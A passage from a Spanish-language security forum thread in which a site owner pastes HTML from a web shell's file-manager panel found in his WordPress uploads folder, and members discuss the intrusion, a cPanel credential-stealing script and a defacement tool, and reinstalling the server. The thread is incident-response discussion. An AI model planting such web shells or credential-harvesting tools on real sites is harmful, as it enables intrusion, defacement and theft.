    </td></tr><tr><td><a id="index.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/index.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> index.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="index.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="index.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="index.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('index.php_link','index.php_form');" />
    </form></td><td>???</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('index.php_link','index.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="index.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="index.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('index.php_link','index.php_form2');" /></form></center></td>
    <td style="text-align:center;">12-Aug-2014 23:58</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/index.php">edit</a> | <a href="javascript:tukar('index.php_link','index.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/index.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/index.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/index.php">gz</a>)
    </td></tr><tr><td><a id="phc_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/phc"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> phc</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="phc_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="phc" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="phc" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('phc_link','phc_form');" />
    </form></td><td>13.1 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('phc_link','phc_form2');">rwxrwxrwx</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="phc_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="phc" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0777" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('phc_link','phc_form2');" /></form></center></td>
    <td style="text-align:center;">12-Aug-2014 23:50</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/phc">edit</a> | <a href="javascript:tukar('phc_link','phc_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/phc">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/phc">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/phc">gz</a>)
    </td></tr><tr><td><a id="sg.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/sg.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> sg.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="sg.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="sg.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="sg.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('sg.php_link','sg.php_form');" />
    </form></td><td>106.03 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('sg.php_link','sg.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="sg.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="sg.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('sg.php_link','sg.php_form2');" /></form></center></td>
    <td style="text-align:center;">14-Aug-2014 22:19</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/sg.php">edit</a> | <a href="javascript:tukar('sg.php_link','sg.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/sg.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/sg.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/sg.php">gz</a>)
    </td></tr><tr><td><a id="usr.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/usr.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> usr.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="usr.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="usr.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="usr.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('usr.php_link','usr.php_form');" />
    </form></td><td>14.95 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('usr.php_link','usr.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="usr.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="usr.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('usr.php_link','usr.php_form2');" /></form></center></td>
    <td style="text-align:center;">13-Aug-2014 00:08</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/usr.php">edit</a> | <a href="javascript:tukar('usr.php_link','usr.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/usr.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/usr.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/usr.php">gz</a>)
    </td></tr><tr><td><a id="w-3.php_link" href="?y=/home/document/public_html/wp-content/uploads/&amp;view=/home/document/public_html/wp-content/uploads/w-3.php"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> w-3.php</a> 
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="w-3.php_form" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="oldname" value="w-3.php" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="w-3.php" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('w-3.php_link','w-3.php_form');" />
    </form></td><td>28.5 kb</td><td style="text-align:center;">document<span class="gaya"> : </span>document</td><td><center>
    <a href="javascript:tukar('w-3.php_link','w-3.php_form2');">rw-r--r--</a>
    <form action="?y=/home/document/public_html/wp-content/uploads/" method="post" id="w-3.php_form2" class="sembunyi" style="margin:0;padding:0;"> 
    <input type="hidden" name="name" value="w-3.php" style="margin:0;padding:0;" /> 
    <input class="inputz" style="width:200px;" type="text" name="newvalue" value="0644" /> 
    <input class="inputzbut" type="submit" name="chmod" value="chmod" /> 
    <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('w-3.php_link','w-3.php_form2');" /></form></center></td>
    <td style="text-align:center;">12-Aug-2014 23:49</td> 
    <td><a href="?y=/home/document/public_html/wp-content/uploads/&amp;edit=/home/document/public_html/wp-content/uploads/w-3.php">edit</a> | <a href="javascript:tukar('w-3.php_link','w-3.php_form');">rename</a>| <a href="?y=/home/document/public_html/wp-content/uploads/&amp;delete=/home/document/public_html/wp-content/uploads/w-3.php">delete</a> | <a href="?y=/home/document/public_html/wp-content/uploads/&amp;dl=/home/document/public_html/wp-content/uploads/w-3.php">download</a>&nbsp;(<a href="?y=/home/document/public_html/wp-content/uploads/&amp;dlgzip=/home/document/public_html/wp-content/uploads/w-3.php">gz</a>)
    </td></tr></table></div></body></html>
    Código:
    <pre align=center><center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></center></pre>
    Estoy pensando en reinstalar el sistema entero por si dejaron algun tipo de backdoor y puedan utilizar el servidor como zombie o algo por el estilo, alguien tiene alguna otra recomendacion??

    Saludos
    "Las repisas que corroen el saber de la zanahoria, estan estimulando e instituyendo a los colombos de la epoca..."
    Citar  
     

  2. #2  
    Avanzado
    Fecha de ingreso
    Sep 2004
    Ubicación
    Me in the middle
    Mensajes
    375
    Descargas
    3
    Uploads
    0
    Estoy viendo los ficheros, el primero que puse es un .php y tiene varios usos pero parece que el uso principal es sacar usuarios y contraseñas de cPanel, que yo no tengo, al buscar en google 1337w0rm se puede ver como funciona en un video.

    Y el segundo es para copiar el index de ellos en todos los index en la carpeta que indique.

    Sigo mirando pero lo que no entiendo es por donde subieron esos ficheros para despues ejecutarlos desde el navegador :S
    "Las repisas que corroen el saber de la zanahoria, estan estimulando e instituyendo a los colombos de la epoca..."
    Citar  
     

  3. #3  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.773
    Descargas
    31
    Uploads
    8
    A mi me parece una inyección de código, si miras en en los formularios, hay cosas que no son propias del PHP. Yo creo que haría una nueva instalación limpia del sistema, como bien dices para curarme en salud
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Sep 2004
    Ubicación
    Me in the middle
    Mensajes
    375
    Descargas
    3
    Uploads
    0
    Cuanto tiempo clarinetista! me alegra saber que seguis por aca!

    Si tiene pinta de eso, lo malo es no saber por donde lo hicieron para repararlo, me imagino que wordpress o algun plugin tiene un agujero de seguridad

    Ahora que ya termine los examenes voy a reinstalar el sistema

    Saludos
    "Las repisas que corroen el saber de la zanahoria, estan estimulando e instituyendo a los colombos de la epoca..."
    Citar  
     

Temas similares

  1. Que hago si me Hackearon mi Whatsapp
    Por jmponcea en el foro TELEFONIA
    Respuestas: 2
    Último mensaje: 04-10-2012, 05:16
  2. Hackearon Mi foro? phpbb
    Por faknnois en el foro VULNERABILIDADES
    Respuestas: 5
    Último mensaje: 17-06-2009, 17:54
  3. hackearon mi orkut
    Por SHERON en el foro OFF-TOPIC
    Respuestas: 2
    Último mensaje: 13-12-2008, 13:48
  4. Hackearon el LHC
    Por 4v7n42 en el foro NOTICIAS
    Respuestas: 1
    Último mensaje: 19-09-2008, 16:03
  5. Me hackearon mi forito!!!!
    Por darkman.cu en el foro INGENIERIA INVERSA
    Respuestas: 4
    Último mensaje: 25-06-2007, 15:20

Marcadores

Marcadores